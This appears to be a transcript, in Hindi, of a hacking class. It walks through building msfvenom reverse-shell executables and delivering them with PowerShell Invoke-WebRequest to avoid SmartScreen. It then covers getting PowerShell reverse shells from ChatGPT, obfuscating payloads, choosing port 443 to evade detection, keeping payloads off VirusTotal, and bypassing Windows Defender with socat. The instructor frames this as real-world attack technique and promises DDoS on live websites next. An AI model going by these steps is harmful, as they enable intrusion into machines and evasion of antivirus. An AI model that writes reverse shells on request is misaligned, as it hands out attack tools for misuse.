चलो तो अब स्टार्ट करते हैं। देखो सबसे पहले अब हम लोग क्या करेंगे, एमएसएफ वेनम से तो पेलोड बनाते थे, अब एक सिंपल भी एमएसएफ वेनम का पेलोड बनता है, उसको बोलते हैं इस तरीके से, ठीक है। एमएसएफ वो डायरेक्ट नेटकैट से कनेक्शन होता है, ठीक है। NC-NVLP 1234 पोर्ट नंबर चालू कर दिया। और अब हम लोग क्या करेंगे, डायरेक्ट कमांड प्रॉम्प्ट का कनेक्शन लेंगे। इसमें विंडोज पेलोड कैसा बनेगा, MSF वेनम -P, है ना, विंडोज x64। हाँ बस 82 82 या 86 ऐसे ही रहता है, X86। हाँ, यहाँ पे X64 सेल रिवर्स TCP होगा, यहाँ पे मीटर पीटर नहीं होगा, ठीक है। हाँ, सेल अंडरस्कोर रिवर्स अंडरस्कोर TCP, ठीक है। और यहाँ पे हो जाएगा L होस्ट इक्वल्स टू इथरनेट 0 L पोर्ट इक्वल्स टू 1234-FEXE-O, ठीक है। मान लो VIM.exe, ओके, ये हो गया। अब इसको जैसे टारगेट पे सेंड करोगे ये एग्जीक्यूट होगा, लेकिन तुम्हारा कनेक्शन जो है मीटर पीटर सेशन से नहीं हो करके तुम्हारा डायरेक्ट नेटकैट से कनेक्शन लिया जाएगा, NC-NVLP 1234। अभी पहले हम लोग क्या करते थे, पहले हम लोग मेटास्प्लॉइट फ्रेमवर्क ओपन करते थे, है ना, उसमें सारा चीज़ लिखते थे, सेट पेलोड विंडोज मीटर पीटर ये वो। ये डायरेक्ट है, ये तुमको बस डायरेक्ट टारगेट पे छोड़ दो और वहाँ पे वो क्या करेगा, विंडोज के कमांड प्रॉम्प्ट का आपको एक्सेस दे देगा, ठीक है। तो कैसे होगा कमांड प्रॉम्प्ट का एक्सेस, यहाँ पे लगाना होगा आपको इस तरीके से, python3-m http.server एंटर कर दो और यहाँ पे कर लो ifconfig eth0 ठीक है। और इसको करो कॉपी करो और फिर यहाँ पे सर्वर स्टार्ट कर दो, ठीक है। और यहाँ पे थोड़ा सा अगर जाना है तो एडवांस जाओ, इसको डाउनलोड कैसे करना है हम लोग डाउनलोड करवा देंगे पावरशेल से, ठीक है। हाँ, इनवोक वेब रिक्वेस्ट से, ठीक है। तो उसके लिए हम लोग क्या करेंगे, हम लोग सिंपल सा करेंगे। और पावरशेल से बहुत चीज़ से डाउनलोड किया जाता है, ऐसा नहीं है कि सिर्फ एक ही चीज़ है, ठीक है। ठीक है, यहाँ पे देखो, यहाँ पे लिखना पड़ेगा IWR-URI, ठीक है, URI HTTP // ठीक है 192.168, ठीक है। वन 192.168.153.196.153, ठीक है, इस टू 8000 है ना। और क्या था, VIM.exe, ठीक है, -o मान लो VIM.exe आ गया। अब देखो यहाँ पे तुम्हारा vim.exe आ गया होगा, देखो यहाँ पे आ गया vim.exe। अब इसको एग्जीक्यूट करना है // ठीक है, vim.exe कर दो एग्जीक्यूट। हाँ, ये पोर्ट नंबर है, बाय डिफॉल्ट 8000 पे लिसन करता है ना, बताए थे ना। यहाँ पे देखो, यहाँ पे देखो 8000 पे है ना, 8000। और देखो यहाँ पे जैसे उसको चलाए, देखो रिवर्सल मिल गया, ठीक है। यहाँ पे रिवर्सल मिल गया, ये क्या हो गया, टारगेट का कमांड प्रॉम्प्ट उठ के हमारे पास आ गया, ठीक है। अब क्योंकि यहाँ पे टारगेट का कमांड प्रॉम्प्ट है, देखो सारा चीज कर सकते हैं, यही है ना हमारा पेलोड, है ना। वहाँ पर क्लिक नहीं करना पड़ता है। नहीं देखो, दो चीज होता है, एक चीज हम बताना भूल गए थे। जब भी तुम अपना पेलोड, जो पेलोड होता है,
उसको अगर तुम IWR इन्वोक वेब रिक्वेस्ट से तुम अगर डाउनलोड करवाओगे तो कोई भी प्रॉम्प्ट नहीं देगा, साइलेंटली एग्जीक्यूट हो जाएगा। जैसे क्या रहा ना अभी ./vim.exe कर दिया, साइलेंटली एग्जीक्यूट हो गया। अगर तुम उसको ब्राउजर के थ्रू डाउनलोड करवाते हो तो तुमको स्मार्ट स्क्रीन आ जाएगा, डू यू वांट टू रन दिस एप्लीकेशन, यस या नो। वो यस या नो को अवॉइड अगर करना है तो बेस्ट तरीका ये है कि तुम पावर सेल के थ्रू डाउनलोड करवाओ, समझे। एग्जीक्यूशन पावर सेल के थ्रू करवाओ, समझे। उसको बोलते हैं IWR इन्वोक वेब रिक्वेस्ट, ठीक है। अब आता है कि तू ये तो समझ गए। अब यहाँ पे देखो, अब साइड बाय साइड अगर तुम कंपेयर करोगे तो तुम्हारा क्या आ गया, तुम्हारा यहाँ पे आ गया कैलकुलेटर वगैरह आ गया, मतलब विंडोज का कमांड प्रॉम्प्ट आ गया। अब यहाँ पर ना तुमको प्रिविलेज एक्सकेलेशन लेने में बड़ा दिक्कत होगा। रीजन क्या है, देखो यहाँ पे जैसे करोगे calc.exe, calc.exe, ठीक है। देखो कैलकुलेटर लॉन्च हो गया इधर। मान लो कुछ और भी लॉन्च करना है तो तुम कर सकते हो, लेकिन यहाँ पे तुम्हारा मेटास्प्लॉइट का तुम्हारे पास हेल्प नहीं है, ठीक है। तो मेटास्प्लॉइट का हेल्प लेने के लिए तुम यहाँ पे कुछ नहीं कर सकते हो। लेकिन रियल लाइफ में जो हैकिंग यूज अटेम्प्ट होता है ना, वो इसी तरीके से होता है। तुमको हमेशा, क्योंकि देखो मेटास्प्लॉइट वाला आज के डेट में पकड़ा जाता है, तो तुम बहुत कुछ कर लोगे तब तुम्हारा ऑफिसकेशन और ये सब टेक्निक के थ्रू तुम उसको यूज कर सकते हो, अनदरवाइज तुम्हारा ये कुछ भी काम नहीं करेगा। तुमको नॉर्मल रिवर्सल इसी तरीके से लेना पड़ेगा, ठीक है। और ज्यादा सही हमको यही लगता है, ठीक है, कि नॉर्मल रिवर्सल जो होता है वो यही लगता है कि तुम इसके थ्रू तुम फिर प्रिविलेज लो। अब तुम्हारा यहाँ से प्रिविलेज कैसे एस्केलेट करोगे, वो कर्नल एक्सप्लॉइट हो गया, वो APT में पढ़ेंगे हम लोग, ठीक है, उसके थ्रू। तो तुम्हारा जो स्टैंडर्ड रिवर्सल है वो कुछ इसी तरीके से दिखेगा, ठीक है। यहाँ से calc.exe चला दो या फिर तुम notepad.exe चला दो, एंटर कर दो, देखो यहाँ पे चल गया सब कुछ। अब यहाँ पे मान लो इसको रीस्टार्ट करना है तो shutdown/s/r/t0, या फिर एक काम कर सकते हो कि मान लो तुमको चाहिए कि कंप्यूटर टारगेट का बंद होने के बाद भी उसको रिवर्सल मिल जाए, ठीक है, वो भी काम हो सकता है तुम्हारा। लेकिन ये वाला क्या होता है कि जब भी तुम कंप्यूटर चालू करके कंप्यूटर रीस्टार्ट करोगे तो उसमें क्या होगा कि तुम्हारा जो एंटीवायरस है वो भी रीस्टार्ट होगा। हर बार फायरवॉल एंटीवायरस बंद करने के बाद, रीस्टार्ट होने के बाद वो काम कर जाता है। तो उस केस में क्या करो, उस केस में ChatGPT से पावर सेल का रिवर्सल बना लो ताकि वो एंटीवायरस बाईपास हो जाए। कैसे होगा? नहीं, माइग्रेट से नहीं हुआ। देखो अब सबसे पहले क्या होगा, जाओ सीधे ChatGPT पे, ठीक है, या फिर काली GPT पे, कहीं भी जाओ और उसको सिंपल सा लिख दो ठीक है। अब यहाँ पर जाओ, काली GPT पे जाओ, ठीक है, और यहाँ पे लिख दो जनरेट अ प्योर पावर शेल रिवर्सल, लिख दिया। वेट करो थोड़ा। नहीं मिला होगा। देखो यहाँ पे अगर तुम देखोगे, फिर से देखते हैं, ठीक है। मान लो इसको तुम क्लिक करोगे ना, ले भाई हट भी गया, यो वो हट भी गया, मतलब रिवर्सल तुम्हारा डिलीट हो गया। कोई नहीं, दूसरा बार कर लेते हैं। देखो मान लो यहाँ पे किया और इसको एग्जीक्यूट किया, रिवर्सल आ गया, ठीक है। अगर तुम करोगे हु एम आई, ठीक है, प्रिव करोगे तो देखो कम प्रिविलेज है, नहीं है तुम्हारे पास उतना प्रिविलेज, ठीक है। तो वही चीज है, इसको करने के लिए तुमको
सबसे पहले इसको करने के लिए तुमको पेलोड या फिर रिवर्स शेल को चलाने के लिए तुमको यहाँ पर प्रिविलेज एस्केलेशन करना पड़ेगा। ठीक है, प्रिविलेज एस्केलेशन करके तुमको बाईपास करना पड़ेगा एंटीवायरस वगैरह सबको। उसके लिए तुम्हारा एक ही चीज़ है, यहाँ पे एआई काम आएगा या फिर तुम खुद से पावर सेल से लिखो। चल क्यों नहीं रहा भाई? क्या नाटक है। एक टीचर में ये लोग हर कुछ खोज लेंगे, टाइम पे आओ, ये करो वो करो, लेकिन अपना इंस्टीट्यूट कभी ढंग से बनाए हैं ये लोग? क्या सिचुएशन है इनका, तो समझ में नहीं आता है। जनरेटर प्योर पावर शेल रिवर्स शेल। ठीक है, अब ये तुमको पावर सेल रिवर्सल जनरेट करके दे दिया। अब बस एक काम करो, इसको चलो एंटीवायरस ऑन भी कर देते हैं। ठीक है, देखते हैं ये काम करता है कि नहीं। इसको हाँ हाँ, ठीक है, टर्न ऑन कर दिया, ऑन कर दो। मैंने सेटिंग्स में गया, ठीक है, खाली इसको ऑफ कर दो। ठीक है, बाकी सब ऑन है ना? अब यहां पर आओ, नोटपैड में आओ, अपना एंटीवायरस रिवर्सल को पेस्ट कर दो। यहाँ पे पेस्ट कर दिया इस तरीके से। यहाँ पे पोर्ट में डाल दो, क्या डाल दो, 1 2 3 4 फॉर एग्जाम्पल 1 2 3 4 डाल दो। ठीक है, और यहाँ पे अपना आईपी एड्रेस डाल दो। ये भी पकड़ा जाता है कभी कभी, ऐसा नहीं है कि नहीं पकड़ाता है ये, लेकिन हमको जहाँ तक लग रहा है ये काम नहीं करेगा। लेकिन लेट्स सी, देखते हैं। यहाँ पे 1 2 3 4, ठीक है, यहाँ पे कर दो सेव एज, डेस्कटॉप पे कर दो, मान लो shell.ps1 के नाम से कर दिया। ठीक है, एक मिनट, p2.ps1 से नाम से सेव कर दो। ठीक है, देखो थ्रेड्स फाउंड हो गया, पकड़ा गया ये। अब दूसरा इसको बनवाओ, इसको ये वाला नहीं काम किया तुम्हारा। ठीक है, छोड़ो काली जीपीटी छोड़ो, यहीं पे जाते हैं चैट जीपीटी से ही बोलते हैं कि भाई बना दे। ठीक है, ठीक है, यहाँ पे लिखो जनरेट अ प्योर पावर शेल रिवर्स शेल। ये वाला काम करता है, ये वाला नहीं पकड़ाता मोस्ट ऑफ द केस में। इसको करो कॉपी और यहाँ पर जाओ, यहाँ पे कर दो इसको पेस्ट। ठीक है, हमेशा याद रखना जब भी तुम्हारा पोर्ट रहेगा ना, यहाँ पे पोर्ट 443 देना। ठीक है, कम चांसेस होता है पोर्ट 443 80 ये सब पोर्ट देगा ना, तो कम चांसेस रहेगा पकड़ाने का। क्योंकि देखो होता क्या है कि तुम्हारा जो पेलोड है वो कम्युनिकेशन करता है टारगेट सर्वर से, और टारगेट सर्वर से कम्युनिकेशन करने के बाद क्या होता है कि वो अनयूजुअल पोर्ट ओपन देखता है ना एंटीवायरस सॉफ्टवेयर वगैरह, तो उसको बोल देता है कि भाई ये अनयूजुअल पोर्ट है। ठीक है, ये वाला जो पोर्ट है ये खतरनाक पोर्ट है, इसको आप ब्लॉक करो, बिना बात का क्यों ओपन है ये, इसलिए वो पकड़ा जाता है। 1 2 3 4 वगैरह देगा तो पकड़ा जाएगा।
इसलिए ज़्यादा चांसेस में 443 यूज़ करूँगा, ठीक है, सर ये क्योंकि ये दोनों कॉमन पोर्ट होता है। 443, 80, 53, 80 ये सब कॉमन पोर्ट होता है, तो ये सब पे नहीं सस्पिशियस फ्लैग होता है, ठीक है। क्या बोल रहे थे? सर इस पर कौन सी सेल मिलेगा? सेल में डायरेक्ट सेल मिलेगा कि इंटरप्रेटर मिलेगा यहाँ पे? इस पर डायरेक्ट सेल। डायरेक्ट सेल मिलेगा। तो सर इस पर रियल अटैकर जो होता है, रियल अटैकर या फिर रियल हैकिंग अटैक जो होता है, उसमें आपको डायरेक्ट सेल ही मिलता है। ये सारा चीज नहीं रहता है कि आपको कुछ और मिल जाएगा। मीटर पीटर, देखो मीटर पीटर सेशन कब काम करता है आज के डेट में, जब आपके पास अच्छा खासा ऑब्फ्यूस्केटर हो। ऑब्फ्यूस्केटर क्या होता है? ऑब्फ्यूस्केटर एक तरीके का टूल है जो कि आपका पेलोड को इनक्रिप्ट कर देता है, इनकोड कर देता है, एंटीवायरस सॉफ्टवेयर वगैरह उसको नहीं पकड़ पाए, ठीक है, तभी उस कंडीशन में काम करता है, नहीं तो नहीं काम कर सकता। आपका मीटर पीटर सेशन इतना आसान नहीं है चलवा देना किसी भी सिस्टम में, तुरंत हैंग ये हो जाएगा वो तो। हाँ, उसका काम कब आएगा? जब आप एंटीवायरस डिसेबल मार दो टारगेट ऑपरेटिंग सिस्टम में, ठीक है, तब आप क्या कर सकते हो, तब जाके आप वहां पे यूज कर सकते हो मीटर पीटर। नहीं तो रियल लाइफ में तुमको इसी पे काम करना पड़ेगा। ये जो है ना नॉर्मल रिवर्सल है जो है ना यहाँ पे NCNVLP 443, ये इसी वाले पे काम करना पड़ेगा, तभी काम होगा, नहीं तो ऐसे नहीं होगा। अब देखो, अब दूसरा क्या होगा, यहाँ पे देखो, अब सबसे पहले तुमको करना क्या है, यहाँ पे आना है और यहाँ पे इसको करो कॉपी। और कॉपी करने के बाद यहाँ पे इसको कर दो पेस्ट, ठीक है, Ctrl V कर दिया और यहाँ पर इसको कर दो सेव एज, कहाँ पे कर दो, डेस्कटॉप पे मान लो, ठीक है, ऑल फाइल्स में एक्सटेंशन क्या देना पड़ेगा? कुछ भी दे सकते हैं इसको। नहीं, cat.ps1 पावर सेल ही देना है, ठीक है, पावर सेल का फाइल। देखो ये भी पकड़ लिया। सोचो कितना ज़्यादा ये अब आज के डेट में एंटीवायरस पकड़ रहा है सब कुछ। हाँ, या फिर तुम दूसरा चीज़ क्या कर सकते हैं, इसको करो कॉपी और डायरेक्ट इसको एंटीवायरस के में जाओ यहाँ पे और विंडोज़ पावर सेल ओपन करके इसको पेस्ट कर दो इस तरीके से, लेकिन ये भी पकड़ा जाएगा। देखो ये काम ही नहीं किया। देखो, हैज बीन मैलिशियस कंटेंट हैज बीन ब्लॉक्ड बाय योर एंटीवायरस सॉफ्टवेयर। अब यहाँ पे कैसे इसको बाईपास करोगे, तो इसके लिए एक टर्म होता है जिसको हम लोग बोलते हैं ऑब्फ्यूस्केशन, ठीक है। तो यहाँ पे बोलता है, यहाँ पे लिखो गॉट YAVOVFUSCATE, ऑब्फ्यूस्केटेड, ठीक है। तो ये ऑब्फ्यूस्केटेड कर देगा तुम्हारा पेलोड को, ठीक है। फर्दर ऑब्फ्यूस्केशन बेस 64 ये वो हो गया। अब ऑब्फ्यूस्केटेड है, अब इसको कॉपी करो और कॉपी करने के बाद इसको पेस्ट करके देखो, अगर ये ऑब्फ्यूस्केट किया होगा तो ठीक है, नहीं तो फिर ये पकड़ा जाएगा। CLS यहाँ पे देखते हैं फिर से एक बार, नोटपैड। स्टार्टिंग में ये नहीं पकड़ाता था, लेकिन अब क्या हो रहा है ना, अब जितना भी एंटीवायरस है सबको नज़र में आ रहा है ये पेलोड, ठीक है, तो ये पकड़ा जा रहा है। देखो सेव एज करो, डेस्कटॉप पे करो और फिर यहाँ पे मान लो ref.ps1, देखो नहीं पकड़ाया मेरे ख्याल से। कहाँ गया? ref.ps1 है, ref.ps1 है नहीं है। नहीं पकड़ाया सर। अब यहाँ पे CMD खोलो और इसको एग्जीक्यूट करवा दो, तो चांसेस है कि ये कुछ देर के बाद ये पकड़ा जाए, लेकिन अभी नहीं पकड़ाया है। PowerShell.exe, एक मिनट, -EP बाईपास, ठीक है, और यहाँ पे /rev.ps1 क्या है, नॉट रिकॉग्नाइज्ड, ओके, यहाँ पे डेस्कटॉप पे होगा। कंटेन मैलिशियस स्क्रिप्ट, ये भी पकड़ा गया। ये सारा का सारा पकड़ा जा रहा है, ठीक है। अब यहाँ पे 2 ही 3 तरीका है जो कि APT में हम बताते हैं, वो हम बता देंगे। हालांकि आज कुछ ज़्यादा नहीं पकड़ रहा है ये एंटीवायरस सॉफ्टवेयर। लॉन्ग रेफ शेल ऑल आर
ऑल आर गेटिंग गॉट। देखो हो सके ये काम कर जाए, ये ना पकड़ाए, ठीक है। देखो होता क्या है ना कि आपके विंडोज डिफेंडर में, आपके ही विंडोज डिफेंडर में एक ऑप्शन रहता है जिसको हम लोग बोलते हैं ऑटोमेटिक सैंपल सबमिशन। यहाँ पर जब भी जाएगा ना, यहाँ पे देखो वायरस एंड थ्रेट प्रोटेक्शन में गया, अब यहाँ पर जाओगे ना तो यहाँ पे एक ऑप्शन रहता है ऑटोमेटिक सैंपल सबमिशन, ये वाला। ये हर घंटा आपका माइक्रोसॉफ्ट सिस्टम का एक स्कैन करता है, स्कैन करने के बाद सारे फाइल्स का डिटेल्स लेता है, सबको माइक्रोसॉफ्ट के सर्वर पे भेजता है। अगर इसको कुछ भी अनयूजुअल लगता है सीधे डिलीट, ठीक है, ये काम करता है, इसीलिए ये पकड़ा जाता है पहला। दूसरा चीज क्या होता है कि जब मान लो आज हम आप लोग को बताइए ये चीज कि ये वाला जो एंटीवायरस है, आज हम बता दिए कि मान लो फॉर एग्जांपल मान लो कि ये वाला जो है ये बाईपास कर दिया आपका विंडोज डिफेंडर, पकड़ में नहीं आया। कल हो के बहुत लोग क्या करेगा कि इसको टेस्ट करने के चक्कर में दूसरे एंटीवायरस सॉफ्टवेयर के ऊपर बाईपास करने के लिए ऑनलाइन एक साइट होता है वायरस टोटल, नाम सुना है ना। वायरस टोटल पे जाके उसको अपलोड करता है। अब जैसे ही वायरस टोटल पे अपलोड होता है वो सारा का सारा फाइल को एनालाइज करता है। थ्रेट हंटर्स, साइबर सिक्योरिटी रिसर्चर्स सारे के सारे एक ही जगह बैठे रहते हैं और वो लोग क्या करते हैं, पूरे के पूरे इंफॉर्मेशन को एंटीवायरस सॉल्यूशन वाली कंपनीज को भेज देते हैं, ठीक है। तो फिर वहां से वो डिटेक्टेबल हो जाता है। तो ये चीज होता है, जब भी आप लोग पेलोड बनाओ तो उसको स्कैन नहीं करो ऑनलाइन स्कैनर से, ठीक है, क्योंकि स्कैन होगा, मेटाडेटा आएगा, डिटेक्ट होगा वो, ठीक है, वो चीज है। अब देखो जैसे ये क्या चीज, जैसे कि पेलोड अगर क्रिएट करना है तो वो उसको स्कैन स्कैन करने के लिए अलग है, नो डिस्ट्रीब्यूट है, ज्योति एंटीवायरस स्कैन करके है, वो सब है, वो सब में दिक्कत नहीं है। लेकिन वायरस टोटल स्कैन कर लेता है, मतलब बता देता है, दिक्कत हो जाता है उसमें। और जैसे कि अगर कोई भी एंटीवायरस या विंडो का डिफेंडर जो होता है वो अगर स्कैन कर ले तो वो भी तो डेटा मेटा डेटा दे देता है। किसका मेटा डेटा? जैसे कि अगर कोई भी वायरस अगर आप ये बता रहे, एक मिनट, देखो ये वाला काम कर गया, देख रहा है, यहाँ पे देखो DIR किया, यहाँ पे पावर चला गया, CD डेस्कटॉप पे जाओ, ठीक है, कहाँ गया DIR, कहाँ गया LS, क्या है, वेरीफाई पाथ इज करेक्टली CD, क्या हो गया इसमें, ठीक है, इसमें तो आया CD DESKTOP डेस्कटॉप, ये साला पेलोडे काम नहीं कर रहा है। वेरीफाई दैट द पाथ इज करेक्ट, टर्म नॉट रिकॉग्नाइज्ड। एक काम करो, इसको ना, इसको इस तरीके से एग्जीक्यूट करवाते हैं। देखो थ्रेड्स फाउंड, देख रहे हो, खतरनाक हो रहा है ना एंटीवायरस, तुरंत पकड़ लिया। यही सब है। देखो अगर नहीं पकड़वाना है ना तो तुमको एंटीवायरस को चकमा देना पड़ेगा दूसरे तरीके से। जैसे एक आता है LOL बाइनरी, जिसको बोलते हैं लिविंग ऑफ द लैंड बाइनरी बोलते हैं, वो भी कैसे काम करेगा वो बता देंगे। या फिर टारगेट ऑपरेटिंग सिस्टम में आप ये इंस्टॉल करवा दो, WSL विंडोज सब सिस्टम फॉर लिनक्स होता है ना। बहुत लोग क्या करता है कि विंडोज को यूज करता है अपने ही मेन ऑपरेटिंग सिस्टम में, तो उसमें एक ऑप्शन आता है WSL विंडोज सब सिस्टम फॉर लिनक्स, ठीक है। वो क्या करता है कि वो विंडोज में ही तुम लिनक्स यूज कर सकते हो, वो इंस्टॉल करवा दो। या फिर पाइथन का पेलोड्स यूज करो एंटीवायरस बाईपास करने के लिए, क्रिप्टर्स यूज करो, टेक्निक बहुत सारा है। अभी तो खैर ये सब पकड़ रहा है। अब इसको हटवाने के लिए दो ही चीज कर सकते हो, या तो इसमें इसको और ऑफिस्केट कर दो या फिर कुछ अलग बाइनरी वगैरह यूज करो, तो वो हो गया। नहीं तो एक और चीज़ है इसको बाईपास करने का, जो कि लेंदी प्रोसेस है, और वो कैसे होगा बताते हैं। ये दिख रहा है socket.exe, देखो ये जो है ना, इससे भी एंटीवायरस बाईपास होता है।
अब देखो यहाँ पे क्या करना, कुछ नहीं है, यहाँ पे CMD ओपन कर लो, ठीक है, यहाँ पे है ये। अब जाओ यहाँ पे और यहाँ पे लिखो ऑनलाइन में सो कैट रिवर्स शेल, ठीक है। ये जो पहला जो साइट आएगा सो कैट रिवर्स शेल वाला, इसमें से एक विंडोज़ वाला साइट रिवर्स शेल वाला उठा लो, माइंड शेल रिवर्स शेल, यहाँ पे हो गया विंडोज़ वाला। तो सो कैट यहाँ से लेकर के यहाँ तक इसको कॉपी कर लो, ठीक है। अब जाओ यहाँ पे लिसनर ऑन कर लो 443, ठीक है। और यहाँ पे क्या लिखना है तुमको, ठीक है, यहाँ पे लिख दो socat.exe, क्योंकि exe फाइल है। यहाँ पे कर दो 443 और यहाँ पे इसका क्या है IP 192.168.196.153। ठीक है, कितना हो गया। अब इसको करो एंटायर को कॉपी करने के बाद आप कर दो यहाँ पे इसको पेस्ट करो, एंटर, देखो आ गया रिवर्सल, पकड़ में आया, एंटीवायरस ऑन है ना, देखो ये विंडोज का है। आ गया, इसे डिटेक्ट नहीं किया है, हाँ इसे डिटेक्ट नहीं किया है, नहीं किया ना calc.exe, जबकि 4 साल पुराना टूल है ये, 4 साल पुराना, अभी तक डिटेक्टेबल नहीं है, ठीक है। तो सोकेट वगैरह से भी बाईपास हो सकता है, ऐसा नहीं है कि नहीं हो सकता है। ये डाउनलोड कहाँ से किए, ये वाला जो फाइल है ये डाउनलोड कहाँ से किए, तो सबसे पहले तुमको जाना है यहाँ पे जाओ, लिखो GitHub सोकेट टेक 128, ठीक है, टेक 128 सोकेट, ठीक है। और यहाँ पर जाना, इस रेपो में जाना और ये वाला पूरा का पूरा जो है इसको डाउनलोड कर लेना, यहाँ पे जाना, यहाँ से डाउनलोड जिप कर लेना, ठीक है। यह तुम्हारा रिपोजिटरी कहाँ क्या हो जाएगा, डाउनलोड हो जाएगा। कब का है ये रिपोजिटरी, है 10 साल पुराना है, 10 ईयर्स अगो, समझे। लेकिन अभी तक विंडोज डिफेंडर इसको पकड़ा नहीं है, इवन दैट कि विंडोज 11 में भी ये काम करता है, ठीक है। और फिर जाना है तुमको सोकेट वाला एक्सट्रैक्ट करके हटाना है यहाँ पे, और इसके फोल्डर में जाना है, और सबसे पहले तुम्हारा यही चीज़ करना है, यहाँ पे कमांड प्रॉम्प्ट ओपन करना है CMD, ठीक है। और इसका रिवर्स शेल कहाँ से लेना है पता ही है, जाओ वहाँ पे बोलो, लिखो सोकेट रिवर्स शेल, यहाँ पे रिवर्स शेल में ये वाला ऑप्शन तुम डाल देना, ठीक है। और जैसे ही इसको पेस्ट करोगे यहाँ पे देखो रिवर्स शेल मिल जाएगा तुमको, ठीक है। एंटीवायरस हो गया बाईपास, समझे। अब जो काम करना है कर लो, यहाँ से कोई दिक्कत नहीं है। इवन दैट कि तुम क्या कर सकते हो कि इसको एग्जीक्यूट करा सकते हो जैसे मशीन स्टार्ट होगा, यहीं से प्रिविलेज एस्केलेशन करना है सर। हाँ यहीं से प्रिविलेज एस्केलेशन करना है, उसके लिए थोड़ा टेक्निक अलग लगेगा, ठीक है। कर्नल एक्सप्लॉइट करना पड़ेगा, हाँ कर्नल एक्सप्लॉइट हो गया, ऑलवेज इंस्टॉल एलिवेटेड हो गया, कुछ कोई अलग फाइल फोल्डर हो गया, कोई सिस्टम का एक्सेस। सर विंडोज के का क्या बोलते हैं, कर्नल एक्सप्लॉइट और खाली का कर्नल एक्सप्लॉइट फर्क होता है सर। फर्क होता है भाई, विंडोज का कर्नल एक्सप्लॉइट अलग है, ऑपरेटिंग सिस्टम का ही फर्क है, तो फर्क नहीं होगा, ठीक है। ये है तुम्हारा सोकेट का रिवर्स शेल, ठीक है। एंटीवायरस यहाँ पे भी बाईपास हो गया। हालांकि डिफरेंट AI से देख सकते हो, जैसे जेमिनाई से जाके बोलो कि ओके,
ना नहीं, ये तो डिटेक्टेबल वाला है। देखते हैं इसको ये डिटेक्टेबल है कि नहीं है। ठीक है, इसको कर दिया। ठीक है, अब देखते हैं यहाँ पे। नहीं, अभी तक तो नहीं पकड़ाया है। r.ps1 कहाँ है? आर ये है ना, काम करते हैं रन विथ पावर शेल। आ गया, देखा, dir आ गया। cal.exe देख रहा, एंटीवायरस तुम्हारा ऑन है ना? किसका मैसेज आया था वो तो उसी का था, अलग से था। यहाँ देखो, विंडोज वायरस एंड थ्रेट प्रोटेक्शन वगैरह ऑन है। ठीक है, देख रहे हो, पूछ रहा है सेंड डेटा, ये देख रहे हो, ये वायरस एंड थ्रेट प्रोटेक्शन ऑन है, लेकिन तुम्हारा एंटीवायरस क्या हुआ, हो गया ना बाईपास। ले भाई, कनेक्शन तो काटा वापस। अब इसको चलाएंगे तो हो सके ना हो जाए, या फिर डिटेक्ट कर ले। नहीं कर रहा अभी तक तो नहीं कर रहा। ठीक है, देख रहा हो, तो इसको बोलते हैं रिवर्स शेल। इस तरीके से ये काम करता है। एआई वगैरह से थोड़ा मोड़ा करने से इधर उधर से हो जाएगा तुम्हारा एंड रिवर्स शेल बाईपास हो जाएगा, और पता भी नहीं चलेगा टारगेट ऑपरेटिंग सिस्टम को। तो इस तरीके से एंटीवायरस भी बाईपास होता है। और भी टेक्निक है, एंटीवायरस बाईपास करने का एक टेक्निक नहीं है। एक चीज होता है कि अगर तुम्हारा रिवर्स शेल जो है क्या इसको बोलते हैं, जैसे तुम ये कर सकते हो, रिवर्स शेल जो है ना तुम्हारा एंटीवायरस, ऐसा नहीं है कि 1-2 दिन के लिए हमेशा के लिए बाईपास हो जाएगा। टेम्पररी होता है, 1 दिन 2 दिन 3 दिन के लिए बाईपास हो सकता है, उससे ज़्यादा देर तक नहीं। कहीं ना कहीं से वो पता कर ही लेता है। ठीक है, तो वो भी एक फ़ायदा है। और ये कैट एंड माउस का खेल है। तो एक बार अगर आप कहीं देखोगे कि किसी भी ऑर्गेनाइजेशन में, कहीं भी किसी भी कंट्री का वेबसाइट भी हैक वैक हुआ, चाहे कुछ भी हुआ, तो उनको पता लग जाता है कुछ दिन के बाद। ठीक है, तो 1 घंटा 4 घंटा 6 घंटा इतना देर तक नहीं पता लग सकता, उसके बाद पता लग जाता है। ठीक है, तो इस कंडीशन में आपका होता है एंटीवायरस बाईपास। ठीक है, समझे? ये नहीं है कि टेम्पोररी हमेशा के लिए हो जाएगा बाईपास। अगर हमेशा के लिए हो जाएगा बाईपास, तब आप एबीटी ग्रुप कहलाइएगा। ठीक है, एडवांस परसिस्टेंस थ्रेट, वो लोग ऐसा काम कर सकते हैं। ठीक है, बाकी एंटीवायरस बाईपास और भी डेप्थ में जाना है तो C++ प्रोग्रामिंग में हाथ घुसाओ। ठीक है, तब तुम्हारा काम बन जाएगा, एंटीवायरस बाईपास हो जाएगा। सेकंड्स में होगा बाईपास, सेकंड्स में कोई भी एंटीवायरस रहे, सिर्फ प्रोग्रामिंग लैंग्वेज C++। अगर नहीं तो C++ सीख जाओ कोड में, खत्म भाई। तुम मैकेफे तक बाईपास कर दोगे, कैस्पर स्काई जो धुरंधर है, बड़ा बड़ा धुरंधर है, उनको भी बाईपास कर दोगे। ऐसा तो छोटा मोटा चीज है, डीपली होना चाहिए, डीप नॉलेज होना चाहिए। डिफरेंट नेटवर्क का बताते हैं, रुक जाओ कुछ देर में।
इसी में बता देंगे। बता दो। हाँ फिजिकली तो एक्सेस करेंगे कर ही ले रहे हैं जैसे टारगेट हाँ एग्जीक्यूट करवाना है तो फिजिकली करना ही नहीं, फिजिकली नहीं, सोशल इंजीनियरिंग से होगा। सर यहाँ से हम लोग फाइल में किसी भी फाइल को डाटा वो डाउनलोड कर सकते हैं। किसी भी फाइल को वो डाटा है वहाँ उसको डाउनलोड कर सकते हैं हम अपने काली मशीन से, जब वहाँ से सेल मिला है हम लोग वहाँ से डाउनलोड कर सकते हैं। नहीं, उसका ऑप्शन टेक्निक रहता है डाउनलोड करवाने का, ऐसे नहीं कर सकते हो, डायरेक्ट नहीं कर सकते हो। ऑप्शन रहता है कि तुम सेंड करवा सकते हो वो फाइल और उसका फाइल डाउनलोड कर सकते हो, लेकिन वो दूसरा वो हार्ड टेक्निक में आता है। बता देंगे उसको भी, कोई दिक्कत नहीं। का पानी है किसी के पास ठंडा? उनको आता है तब तक ट्राई करो, इसका पेलोड देखो तुम लोग, है ना। इसके बाद डॉस डी डॉस पढ़ा देंगे, ठीक है। डॉस और डी डॉस, डॉस एंड डी डॉस कैसे करते हैं लाइव वेबसाइट भी पे भी करके दिखा देंगे, ठीक है। तो आते हैं बस 2 मिनट में। कुछ खा हुआ के नहीं आए हैं यार, घर में वैसे भी कोई है नहीं, ऐसे ही हालत खराब हो जाता है उतना दूर से आने के बाद। आते हैं। 